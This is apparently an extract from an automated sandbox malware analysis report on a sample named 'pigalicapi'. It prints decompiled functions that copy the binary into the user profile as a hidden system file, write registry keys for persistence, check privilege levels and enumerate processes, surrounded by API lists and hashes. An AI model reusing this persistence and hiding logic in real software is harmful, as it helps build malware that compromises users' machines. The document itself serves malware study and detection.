					E024E1CA0(_a4 + 0x204, 0x104); // executed
					E024E9D20( &_v24, _a4 + 0x40c, 0x27); // executed
					E024E7B70(_a4 + 0x45b,  &_v24, 0x10);
					_t59 = E024E5CD0(_a4 + 0x100); // executed
					 *((intOrPtr*)(_a4 + 0x433)) = _t59;
					lstrcpyA(_a4 + 0x43b, "pigalicapi");
					E024E7D20( &_v556,  &_v556, 0, 0x208);
					_v28 = 0x207;
					if(( *0x24f435a & 0x000000ff) == 0) {
						GetEnvironmentVariableA("USERPROFILE",  &_v556, 0x207); // executed
					} else {
						__imp__GetAllUsersProfileDirectoryA( &_v556,  &_v28);
					}
					wnsprintfA(_a4 + 0x308, 0x104, "%s\\%s.exe",  &_v556, "pigalicapi");
					_t67 = CreateFileA(_a4 + 0x100, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_v32 = _t67;
					if(_v32 != 0xffffffff) {
						_v560 = GetFileSize(_v32, 0);
						if(_v560 > 0) {
							_t71 = VirtualAlloc(0, _v560, 0x3000, 4); // executed
							_v564 = _t71;
							if(_v564 != 0) {
								_v568 = 0;
								ReadFile(_v32, _v564, _v560,  &_v568, 0); // executed
								if(_v568 != _v560) {
									VirtualFree(_v564, 0, 0x8000);
								} else {
									 *(_a4 + 0x453) = _v560;
									 *(_a4 + 0x457) = _v564;
								}
							}
						}
						FindCloseChangeNotification(_v32); // executed
					}
					_v5 = 1;
				}
				return _v5;
			}

0x024e5709
0x024e5711
0x024e5729
0x024e5742
0x024e5756
0x024e576e
0x024e5786
0x024e5798
0x024e57a3
0x024e57b8
0x024e57cc
0x024e57d4
0x024e57e4
0x024e580a
0x024e57e6
0x024e57f1
0x024e57f1
0x024e582f
0x024e5854
0x024e585a
0x024e5861
0x024e5873
0x024e5880
0x024e5896
0x024e589c
0x024e58a9
0x024e58ab
0x024e58d0
0x024e58e2
0x024e5912
0x024e58e4
0x024e58ed
0x024e58fc
0x024e58fc
0x024e58e2
0x024e58a9
0x024e591c
0x024e591c
0x024e5922
0x024e5922
0x024e592c

APIs

Part of subcall function 024E8F80: GetVersionExA.KERNEL32(0000009C), ref: 024E8FF7
Part of subcall function 024E8F80: GetSystemInfo.KERNEL32(?), ref: 024E9009
Part of subcall function 024E8F80: lstrcatA.KERNEL32(00000000,Win2K), ref: 024E902E
Part of subcall function 024E8F80: lstrcatA.KERNEL32(00000000,_x64), ref: 024E9222
Part of subcall function 024E8F80: lstrlenA.KERNEL32(?), ref: 024E922F
Part of subcall function 024E8F80: lstrcatA.KERNEL32(00000000,024EC980), ref: 024E9242
Part of subcall function 024E8F80: lstrcatA.KERNEL32(00000000,?), ref: 024E9253
Part of subcall function 024E8F80: lstrlenA.KERNEL32(00000000), ref: 024E925D
Part of subcall function 024E8F80: lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 024E9275

GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 024E5742

Part of subcall function 024E1CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 024E1CB1
Part of subcall function 024E1CA0: Process32First.KERNEL32(000000FF,00000128), ref: 024E1CE1
Part of subcall function 024E1CA0: GetCurrentProcessId.KERNEL32 ref: 024E1CEE
Part of subcall function 024E1CA0: Process32First.KERNEL32(000000FF,00000128), ref: 024E1D52
Part of subcall function 024E1CA0: lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 024E1D78
Part of subcall function 024E1CA0: lstrcpyA.KERNEL32(-00000204,?), ref: 024E1D92
Part of subcall function 024E1CA0: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 024E1DA6
Part of subcall function 024E1CA0: EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 024E1DDC
Part of subcall function 024E1CA0: GetModuleFileNameExA.PSAPI(00000000,?,-00000204,024E575B,00000000,?,00000004,00000000), ref: 024E1DFB
Part of subcall function 024E1CA0: FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,024E575B,00000000,?,00000004,00000000), ref: 024E1E21
Part of subcall function 024E1CA0: CloseHandle.KERNEL32(000000FF), ref: 024E1E4B

Part of subcall function 024E9D20: GetSystemDirectoryA.KERNEL32 ref: 024E9D9A
Part of subcall function 024E9D20: GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 024E9DDD
Part of subcall function 024E9D20: StringFromCLSID.OLE32(00000020,?), ref: 024E9EF7

Part of subcall function 024E5CD0: lstrlenA.KERNEL32(00000000), ref: 024E5CEB
Part of subcall function 024E5CD0: CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024E5D10
Part of subcall function 024E5CD0: GetFileSize.KERNEL32(000000FF,00000000), ref: 024E5D29
Part of subcall function 024E5CD0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E5D45
Part of subcall function 024E5CD0: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 024E5D6D
Part of subcall function 024E5CD0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E5D99
Part of subcall function 024E5CD0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 024E5DA3

lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 024E57B8
GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 024E57F1
GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000207), ref: 024E580A
wnsprintfA.SHLWAPI ref: 024E582F
CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024E5854
GetFileSize.KERNEL32(000000FF,00000000), ref: 024E586D
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E5896
ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 024E58D0
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E5912
FindCloseChangeNotification.KERNEL32(000000FF), ref: 024E591C

Strings

USERPROFILE, xrefs: 024E5805
%s\%s.exe, xrefs: 024E581C
pigalicapi, xrefs: 024E57A9, 024E5810

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: File$lstrcat$CloseVirtuallstrlen$ChangeCreateFindNotificationProcess$AllocDirectoryFirstFreeModuleNameProcess32ReadSizeSystemlstrcpy$CurrentEnumEnvironmentFromHandleInfoInformationModulesOpenProfileSnapshotStringToolhelp32UsersVariableVersionVolumewnsprintf
String ID: %s\%s.exe$USERPROFILE$pigalicapi
API String ID: 1116761331-4090404022
Opcode ID: cf5a5b280d0d8650e11acafc6a90087f0e8dad50cf857a4271c4276ac91d4c80
Instruction ID: 5bd8112d48e739b599eb1ba5d97740113c7b0139a46ec1129dbc77c7410b75ed
Opcode Fuzzy Hash: cf5a5b280d0d8650e11acafc6a90087f0e8dad50cf857a4271c4276ac91d4c80
Instruction Fuzzy Hash: 0C5184B1940208FBFF14DFA0DC99FEE7735AB44709F008599F60A6A281D774AA90CF94

Uniqueness

Uniqueness Score: -1.00%

Function 024E1120 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 116
stringfilethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E024E1120(CHAR* _a4, CHAR* _a8, signed int _a12, signed char _a16, void** _a20) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				void* _v16;
				char _v284;
				void* _v288;
				char _v556;
				void* _v560;
				void* _v564;
				void* _t58;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && lstrlenA(_a4) != 0 && lstrlenA(_a8) != 0) {
					_v12 = 0x104;
					if((_a12 & 0x000000ff) == 0) {
						GetEnvironmentVariableA("USERPROFILE",  &_v284, 0x104);
					} else {
						__imp__GetAllUsersProfileDirectoryA( &_v284,  &_v12);
					}
					wnsprintfA( &_v556, 0x103, "%s\\%s.exe",  &_v284, _a8);
					if(lstrcmpiA(_a4,  &_v556) != 0 && (_a16 & 0x000000ff) == 0) {
						CopyFileA(_a4,  &_v556, 0);
						SetFileAttributesA( &_v556, 6);
						lstrcpyA(_a4,  &_v556);
					}
					_v560 = E024E97A0(0x30d);
					_v16 = _v560;
					 *((char*)(_v16 + 0x30c)) = _a12;
					lstrcpyA(_v16,  &_v556);
					lstrcpyA(_v16 + 0x208, _a8);
					_t58 = CreateThread(0, 0, E024E12D0, _v16, 0, 0); // executed
					_v288 = _t58;
					if(_v288 == 0) {
						_v564 = _v16;
						E024E97C0(_v564);
					} else {
						if(_a20 != 0) {
							 *_a20 = _v288;
						}
						_v8 = 1;
					}
				}
				return _v8;
			}

0x024e1129
0x024e1134
0x024e1168
0x024e1175
0x024e119b
0x024e1177
0x024e1182
0x024e1182
0x024e11bd
0x024e11d9
0x024e11f0
0x024e11ff
0x024e1210
0x024e1210
0x024e1223
0x024e122f
0x024e1238
0x024e1249
0x024e125d
0x024e1274
0x024e127a
0x024e1287
0x024e12a6
0x024e12b3
0x024e1289
0x024e128d
0x024e1298
0x024e1298
0x024e129a
0x024e129a
0x024e1287
0x024e12c1

APIs

lstrlenA.KERNEL32(00000000), ref: 024E1148
lstrlenA.KERNEL32(00000000), ref: 024E115A
GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 024E1182

Part of subcall function 024E97C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 024E97CF
Part of subcall function 024E97C0: RtlFreeHeap.NTDLL(00000000), ref: 024E97D6

GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 024E119B
wnsprintfA.SHLWAPI ref: 024E11BD
lstrcmpiA.KERNEL32(00000104,?), ref: 024E11D1
CopyFileA.KERNEL32(00000104,?,00000000), ref: 024E11F0
SetFileAttributesA.KERNEL32(?,00000006), ref: 024E11FF
lstrcpyA.KERNEL32(00000104,?), ref: 024E1210
lstrcpyA.KERNEL32(00000000,?), ref: 024E1249
lstrcpyA.KERNEL32(-00000208,00000000), ref: 024E125D
CreateThread.KERNEL32 ref: 024E1274

Strings

%s\%s.exe, xrefs: 024E11AC
USERPROFILE, xrefs: 024E1196

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: lstrcpy$FileHeaplstrlen$AttributesCopyCreateDirectoryEnvironmentFreeProcessProfileThreadUsersVariablelstrcmpiwnsprintf
String ID: %s\%s.exe$USERPROFILE
API String ID: 1231128424-1744756051
Opcode ID: d9dd8403d977f554838e6ba219013a132a30428e89e4f5ed6b9b70c2073530da
Instruction ID: 507595f72c0321370dadaac13f5800ec933ddb972f2a4f36faf95b7de43b77ac
Opcode Fuzzy Hash: d9dd8403d977f554838e6ba219013a132a30428e89e4f5ed6b9b70c2073530da
Instruction Fuzzy Hash: 4B413175940208EBEF14CFE4DC89FDE77B4AB48705F00859AEA1E9A281D774DA94CF90

Uniqueness

Uniqueness Score: -1.00%

Function 024E99F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E024E99F0() {
				intOrPtr _v8;
				char _v9;
				void* _v16;
				char _v1044;
				char _v2068;
				long _v2072;
				void* _v2076;
				void* _v2080;
				char _v2084;
				int _t43;

				_v9 = 0;
				_v8 = 0x400;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v16) == 0) {
					L12:
					return _v9;
				}
				_v2072 = 0;
				GetTokenInformation(_v16, 1, 0, 0,  &_v2072); // executed
				if(_v2072 >= 0x400) {
					L11:
					CloseHandle(_v16);
					goto L12;
				}
				_v2076 =  &_v1044;
				_t43 = GetTokenInformation(_v16, 1, _v2076, _v2072,  &_v2072); // executed
				if(_t43 == 0) {
					goto L11;
				}
				_v2080 =  &_v2068;
				_v2084 = 0x44;
				__imp__CreateWellKnownSid(0xc, 0, _v2080,  &_v2084);
				if(EqualSid(_v2080,  *_v2076) == 0) {
					__imp__CreateWellKnownSid(0x16, 0, _v2080,  &_v2084);
					if(EqualSid(_v2080,  *_v2076) == 0) {
						__imp__CreateWellKnownSid(0x17, 0, _v2080,  &_v2084);
						if(EqualSid(_v2080,  *_v2076) == 0) {
							__imp__CreateWellKnownSid(0x18, 0, _v2080,  &_v2084);
							if(EqualSid(_v2080,  *_v2076) == 0) {
								goto L11;
							}
							return 1;
						}
						return 1;
					}
					return 1;
				}
				return 1;
			}

0x024e99f9
0x024e99fd
0x024e9a19
0x024e9b80
0x00000000
0x024e9b80
0x024e9a1f
0x024e9a3a
0x024e9a4a
0x024e9b76
0x024e9b7a
0x00000000
0x024e9b7a
0x024e9a56
0x024e9a77
0x024e9a7f
0x00000000
0x00000000
0x024e9a8b
0x024e9a91
0x024e9aad
0x024e9acb
0x024e9ae6
0x024e9b04
0x024e9b1c
0x024e9b3a
0x024e9b52
0x024e9b70
0x00000000
0x00000000
0x00000000
0x024e9b72
0x00000000
0x024e9b3c
0x00000000
0x024e9b06
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000008,?), ref: 024E9A0A
OpenProcessToken.ADVAPI32(00000000), ref: 024E9A11
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 024E9A3A
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 024E9A77
CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 024E9AAD
EqualSid.ADVAPI32(?,00000000), ref: 024E9AC3
CreateWellKnownSid.ADVAPI32(00000016,00000000,?,00000044), ref: 024E9AE6
EqualSid.ADVAPI32(?), ref: 024E9AFC
CloseHandle.KERNEL32(?), ref: 024E9B7A

Strings

D, xrefs: 024E9A91

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Token$CreateEqualInformationKnownProcessWell$CloseCurrentHandleOpen
String ID: D
API String ID: 98007406-2746444292
Opcode ID: d7e442909d98b6f7d6aae186034cc81a1d555221a58ab69e0166efe47b910dc1
Instruction ID: a759b02170a859765882f9087ab1bfbc377141d9c7af17fa78c5cf0cd8aa91f3
Opcode Fuzzy Hash: d7e442909d98b6f7d6aae186034cc81a1d555221a58ab69e0166efe47b910dc1
Instruction Fuzzy Hash: D841FE75A40218EBEB24CF90CC85FDAB3BDBF48705F00C5D9E65996281DB709A42CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 024E5A00 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 99
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E024E5A00(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				void* _t27;
				void* _t33;
				CHAR* _t35;
				int _t39;
				long _t43;
				CHAR* _t51;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 > 0x10) {
					E024E7D20(_t27, "Mzsrkvcweomac", 0, 0xe);
					lstrcpyA("Mzsrkvcweomac", "WDefault");
					_t33 = E024E5930(_a4 + 0x45b, "Mzsrkvcweomac", 0xd); // executed
					E024E7D20(_t33, _a8, 0, _a12);
					_t35 =  *0x24f189c; // 0x24ec4e0
					if(lstrlenA(_t35) < _a12) {
						_t51 =  *0x24f189c; // 0x24ec4e0
						lstrcpyA(_a8, _t51);
						_t39 = lstrlenA(_a8);
						if(_t39 + lstrlenA(?str?) < _a12) {
							lstrcatA(_a8, "Mzsrkvcweomac");
							_v12 = 0x80000001;
							_v16 = 0;
							_v20 = 0;
							_t43 = RegCreateKeyExA(_v12, _a8, 0, 0, 0, 0x20006, 0,  &_v16,  &_v20); // executed
							if(_t43 != 0) {
								E024E7D20(_t43, _a8, 0, _a12);
								lstrcpyA(_a8, "software\\microsoft\\windows\\currentversion\\uninstall");
							} else {
								RegCloseKey(_v16); // executed
							}
							_v8 = lstrlenA(_a8);
						}
					}
				}
				return _v8;
			}

0x024e5a07
0x024e5a12
0x024e5a35
0x024e5a47
0x024e5a5d
0x024e5a6f
0x024e5a77
0x024e5a86
0x024e5a8c
0x024e5a97
0x024e5aa1
0x024e5ab9
0x024e5ac8
0x024e5ace
0x024e5ad5
0x024e5adc
0x024e5b00
0x024e5b08
0x024e5b20
0x024e5b31
0x024e5b0a
0x024e5b0e
0x024e5b0e
0x024e5b41
0x024e5b41
0x024e5ab9
0x024e5a86
0x024e5b4b

APIs

lstrcpyA.KERNEL32(Mzsrkvcweomac,WDefault), ref: 024E5A47

Part of subcall function 024E5930: CharUpperA.USER32(00000000), ref: 024E59E2

lstrlenA.KERNEL32(024EC4E0), ref: 024E5A7D
lstrcpyA.KERNEL32(00000000,024EC4E0), ref: 024E5A97
lstrlenA.KERNEL32(00000000), ref: 024E5AA1
lstrlenA.KERNEL32(Mzsrkvcweomac), ref: 024E5AAE
lstrcatA.KERNEL32(00000000,Mzsrkvcweomac), ref: 024E5AC8
RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 024E5B00
RegCloseKey.KERNEL32(00000000), ref: 024E5B0E
lstrcpyA.KERNEL32(00000000,software\microsoft\windows\currentversion\uninstall), ref: 024E5B31
lstrlenA.KERNEL32(00000000), ref: 024E5B3B

Strings

software\microsoft\windows\currentversion\uninstall, xrefs: 024E5B28
Mzsrkvcweomac, xrefs: 024E5A30, 024E5A42, 024E5A4F, 024E5AA9, 024E5ABF
WDefault, xrefs: 024E5A3D

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: lstrlen$lstrcpy$CharCloseCreateUpperlstrcat
String ID: Mzsrkvcweomac$WDefault$software\microsoft\windows\currentversion\uninstall
API String ID: 4161867159-2878899710
Opcode ID: 4fe1083c5f5c807082947708a3ff8ff807fc95e5cb4947ba335c4b695301865d
Instruction ID: 551b7a4ef8587c452c8c847962d86f61e0ffe9fea5f000b3aa8ea63aebd63c73
Opcode Fuzzy Hash: 4fe1083c5f5c807082947708a3ff8ff807fc95e5cb4947ba335c4b695301865d
Instruction Fuzzy Hash: 8C313B75A40208FBFF14DFE4E889FAE7775AB44716F10890AFB1A9B281D7B095108F50

Uniqueness

Uniqueness Score: -1.00%

Function 024E1CA0 Relevance: 21.1, APIs: 14, Instructions: 111
stringprocessCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E024E1CA0(CHAR* _a4, intOrPtr _a8) {
				char _v5;
				char _v272;
				long _v284;
				intOrPtr _v300;
				void* _v308;
				void* _v312;
				long _v316;
				long _v320;
				void* _v324;
				char _v328;
				int _v332;
				void* _t44;
				int _t47;
				void* _t61;

				_v5 = 0;
				_t44 = CreateToolhelp32Snapshot(2, 0); // executed
				_v312 = _t44;
				if(_v312 == 0xffffffff) {
					L18:
					return _v5;
				}
				_v308 = 0x128;
				_t47 = Process32First(_v312,  &_v308); // executed
				if(_t47 == 0) {
					L17:
					CloseHandle(_v312);
					goto L18;
				}
				_v320 = GetCurrentProcessId();
				_v316 = 0;
				while(_v300 != _v320) {
					if(Process32Next(_v312,  &_v308) != 0) {
						continue;
					}
					L6:
					if(_v316 != 0 && Process32First(_v312,  &_v308) != 0) {
						while(_v300 != _v316) {
							if(Process32Next(_v312,  &_v308) != 0) {
								continue;
							}
							goto L17;
						}
						if(lstrlenA( &_v272) < _a8) {
							lstrcpyA(_a4,  &_v272);
							_v324 = OpenProcess(0x410, 0, _v316);
							if(_v324 != 0) {
								_v332 = 0;
								_push( &_v332);
								_push(4);
								_push( &_v328);
								_t61 = _v324;
								_push(_t61); // executed
								L024EB1D4(); // executed
								if(_t61 == 0) {
									_push(_a8);
									_push(_a4);
									_push(_v324); // executed
									L024EB1C8(); // executed
								} else {
									_push(_a8);
									_push(_a4);
									_push(_v328);
									_push(_v324);
									L024EB1CE();
								}
								_v5 = 1;
								FindCloseChangeNotification(_v324); // executed
							}
						}
					}
					goto L17;
				}
				_v316 = _v284;
				goto L6;
			}

0x024e1ca9
0x024e1cb1
0x024e1cb6
0x024e1cc3
0x024e1e51
0x024e1e57
0x024e1e57
0x024e1cc9
0x024e1ce1
0x024e1ce8
0x024e1e44
0x024e1e4b
0x00000000
0x024e1e4b
0x024e1cf4
0x024e1cfa
0x024e1d04
0x024e1d35
0x00000000
0x00000000
0x024e1d37
0x024e1d3e
0x024e1d5f
0x024e1e3e
0x00000000
0x00000000
0x00000000
0x024e1e3e
0x024e1d81
0x024e1d92
0x024e1dac
0x024e1db9
0x024e1dbb
0x024e1dcb
0x024e1dcc
0x024e1dd4
0x024e1dd5
0x024e1ddb
0x024e1ddc
0x024e1de3
0x024e1e05
0x024e1e09
0x024e1e10
0x024e1e11
0x024e1de5
0x024e1de8
0x024e1dec
0x024e1df3
0x024e1dfa
0x024e1dfb
0x024e1dfb
0x024e1e16
0x024e1e21
0x024e1e21
0x024e1db9
0x024e1e27
0x00000000
0x024e1d3e
0x024e1d18
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 024E1CB1
Process32First.KERNEL32(000000FF,00000128), ref: 024E1CE1
GetCurrentProcessId.KERNEL32 ref: 024E1CEE
Process32Next.KERNEL32 ref: 024E1D2E
Process32First.KERNEL32(000000FF,00000128), ref: 024E1D52
lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 024E1D78
lstrcpyA.KERNEL32(-00000204,?), ref: 024E1D92
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 024E1DA6
EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 024E1DDC
GetModuleFileNameExA.PSAPI(00000000,?,-00000204,024E575B,00000000,?,00000004,00000000), ref: 024E1DFB
GetProcessImageFileNameA.PSAPI(00000000,-00000204,024E575B,00000000,?,00000004,00000000), ref: 024E1E11
FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,024E575B,00000000,?,00000004,00000000), ref: 024E1E21
Process32Next.KERNEL32 ref: 024E1E37
CloseHandle.KERNEL32(000000FF), ref: 024E1E4B

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: ProcessProcess32$CloseFileFirstNameNext$ChangeCreateCurrentEnumFindHandleImageModuleModulesNotificationOpenSnapshotToolhelp32lstrcpylstrlen
String ID:
API String ID: 384183238-0
Opcode ID: e85d3127820229cd7d00ab32f544388ab4acf1b040bd49055395b285f42cb74c
Instruction ID: d67660a2cee2d440c1ecef299eb7f645be34a503d836456f11f8cdca1bc0fb6b
Opcode Fuzzy Hash: e85d3127820229cd7d00ab32f544388ab4acf1b040bd49055395b285f42cb74c
Instruction Fuzzy Hash: DA41D9719402189BEF25EBA5CD84BEEB7B9AF48315F0045C9E60EA6280D770AF84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 024E5F30 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 80
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E5F30() {
				char* _v8;
				signed int _v9;
				void* _v16;
				void* _v20;
				char _v284;
				int _v288;
				int _v292;
				char _v324;
				int _v328;
				char* _t27;
				CHAR* _t30;
				long _t33;
				long _t37;

				_v9 = 0;
				_t27 =  *0x24f18a0; // 0x24f3b88
				_v8 = _t27;
				E024E7D20(_t27,  &_v284, 0, 0x104);
				lstrcpyA( &_v284, "pigalicapi");
				_t30 =  *0x24f1898; // 0x24f3fe2
				lstrcatA( &_v284, _t30);
				_v16 = 0x80000001;
				if(( *0x24f435a & 0x000000ff) != 0) {
					_v16 = 0x80000002;
				}
				_v20 = 0;
				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
				if(_t33 == 0) {
					_v292 = 0x20;
					_v288 = 0x20;
					_t37 = RegQueryValueExA(_v20,  &_v284, 0, 0,  &_v324,  &_v288); // executed
					if(_t37 == 0) {
						_v9 = 1;
					}
					_t47 = _v9 & 0x000000ff;
					if((_v9 & 0x000000ff) == 0) {
						_v328 = 0x10;
						E024E9BD0(_t47,  &_v324, 0x10);
						RegSetValueExA(_v20,  &_v284, 0, 3,  &_v324, 0x10);
					}
					RegCloseKey(_v20); // executed
				}
				return _v9;
			}

0x024e5f39
0x024e5f3d
0x024e5f42
0x024e5f53
0x024e5f67
0x024e5f6d
0x024e5f7a
0x024e5f80
0x024e5f90
0x024e5f92
0x024e5f92
0x024e5f99
0x024e5fb3
0x024e5fbb
0x024e5fc1
0x024e5fcb
0x024e5ff2
0x024e5ffa
0x024e5ffc
0x024e5ffc
0x024e6000
0x024e6006
0x024e6008
0x024e601b
0x024e603b
0x024e603b
0x024e6045
0x024e6045
0x024e6051

APIs

lstrcpyA.KERNEL32(?,pigalicapi), ref: 024E5F67
lstrcatA.KERNEL32(?,024F3FE2), ref: 024E5F7A
RegOpenKeyExA.KERNEL32(80000001,024E3C58,00000000,000F003F,00000000), ref: 024E5FB3
RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 024E5FF2
RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 024E603B
RegCloseKey.KERNEL32(00000000), ref: 024E6045

Strings

pigalicapi, xrefs: 024E5F5B
, xrefs: 024E5FC1
, xrefs: 024E5FCB

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Value$CloseOpenQuerylstrcatlstrcpy
String ID: $ $pigalicapi
API String ID: 764223185-550099112
Opcode ID: 660f59221f19b185fb4e918f4b6d5b6f3b2722342581d1044fa2248809bcc2f6
Instruction ID: 602447c46e1097d8861af7c42e73ca72bfccc3cbcbfefad316e19de205692d7d
Opcode Fuzzy Hash: 660f59221f19b185fb4e918f4b6d5b6f3b2722342581d1044fa2248809bcc2f6
Instruction Fuzzy Hash: D831A4B1D4021CABEF14CF90DC45FFEB778AB48705F008889EB09A6281D7B55644CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 004102F0 Relevance: 15.1, APIs: 10, Instructions: 129threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0041033E

Part of subcall function 00410280: fprintf.MSVCRT ref: 004102C0

GetCurrentThreadId.KERNEL32 ref: 00410372
CreateEventA.KERNEL32 ref: 0041039A
GetCurrentProcess.KERNEL32 ref: 004103D9
GetCurrentThread.KERNEL32 ref: 004103DE
GetCurrentProcess.KERNEL32 ref: 004103E6
DuplicateHandle.KERNELBASE ref: 00410415
GetThreadPriority.KERNEL32 ref: 0041042C
TlsSetValue.KERNEL32 ref: 0041045E

Part of subcall function 00414330: strlen.NTDLL ref: 0041433F
Part of subcall function 00414330: memcpy.NTDLL ref: 0041438D
Part of subcall function 00414330: CreateMutexA.KERNEL32 ref: 004143F5
Part of subcall function 00414330: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040F2D5), ref: 00414410
Part of subcall function 00414330: FindAtomA.KERNEL32 ref: 00414421
Part of subcall function 00414330: malloc.MSVCRT ref: 00414439
Part of subcall function 00414330: AddAtomA.KERNEL32 ref: 00414463
